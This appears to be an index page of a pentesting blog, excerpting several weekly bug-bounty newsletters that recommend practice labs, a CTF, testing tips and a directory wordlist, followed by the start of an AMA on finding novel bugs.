The 5 Hacking NewsLetter 53

Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.

This issue covers the week from 3 to 10 of May.

T5HN53.png

Our favorite 5 hacking items

1. Challenge of the week

Authentication Lab (online), Source code & Walkthroughs

This is a great lab if you want to practice finding authentication vulnerabilities. There are 5 bugs: IP based authentication bypass, Timing attack, Client side auth, Leaky JWT and JWT Signature Disclosure (CVE-2019-7644).

Also, if stuck, check out the walkthroughs. I don’t want to read them before doing the challenges but they seem detailed (like 5 articles in 1!).

More …

The 5 Hacking NewsLetter 52

Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.

This issue covers the week from 26 of April to 03 of May.

T5HN40.png

Our favorite 5 hacking items

1. Video of the week

5 super important main-app testing tips for bug bounty hunters with STOK&Haddix

Any video by @stokfredrik & @jhaddix is a must watch! This one has 5 crucials things you want to do as a bug hunter:

  • Don’t limit yourself to the external attack surface. Log in as different users & try to find where the sensitive functionality is => access controls bugs & IDOR
  • Find out how the site references you as a user (& what you’re allowed to do) => IDOR, File upload, RCE
  • Test all parameters => SSRF, LFI, RFI, Path traversal
  • Content discovery => hidden paths, private data leakage => Authentication bypass, logic flaws
  • Find out which business flaws the target cares about (other than technical bugs)

But this is not all. Watch the video. It’s short but full-packed with information!

More …

The 5 Hacking NewsLetter 51

Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.

This issue covers the week from 19 to 26 of April.

T5HN51.png

Our favorite 5 hacking items

1. Challenge of the week

CTF Challenge

I haven’t had the time yet to do this CTF, but it’s on my todo list because it seems different. It’s a Web CTF that involves multiple subdomains, directory bruteforce, and different attack vectors.

So it’s a nice opportunity to practice recon. But make sure to respect the rules (attacking the infrastructure/ports other than 443 is not allowed).

More …

The 5 Hacking NewsLetter 50

Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.

This issue covers the week from 12 to 19 of April.

T5HN50.png

Our favorite 5 hacking items

1. Resource of the week

Content_discovery_nullenc0de.txt

This is a new content discovery wordlist by @nullenc0de, to use for file & directory bruteforce with tools like dirsearch, dirb, etc. It’s based on @JHaddix’s content_discovery_all.txt dictionary but has 300k more directories/files.

As a comparison, here is the exact number of entries in these two and in dirsearch’s default dictionary:

# wc -l content_discovery_all.txt
373535 content_discovery_all.txt
# wc -l /root/tools/dirsearch/db/dicc.txt
6087 /root/tools/dirsearch/db/dicc.txt
# wc -l content_discovery_nullenc0de.txt
623103 content_discovery_nullenc0de.txt
More …

How to think out of the box with @gwendallecoguic

how-to-think-out-of-the-box-with-eraymitrani.png

Hey hackers! This is another AMA on the topic of: How to think out of the box?

If you haven’t checked out the other ones, they’re at https://pentester.land/ama.
And the podcast episode that started this whole series is The Bug Hunter Podcast 4: Bypassing email filters & Thinking out of the box.
While preparing it, I wanted to include advice from different bug hunters. So I asked several hackers these 3 specific questions:

  • How to find bugs that are not duplicates?
  • How to find new areas of research (like in @securinti’s last blog post or what James Kettle does)?
  • How to find logic bugs or bugs that don’t fall under any category, can’t be found with tools or require real thinking?

@gwendallecoguic was one of the awesome hackers who responded. Here is his advice:

More …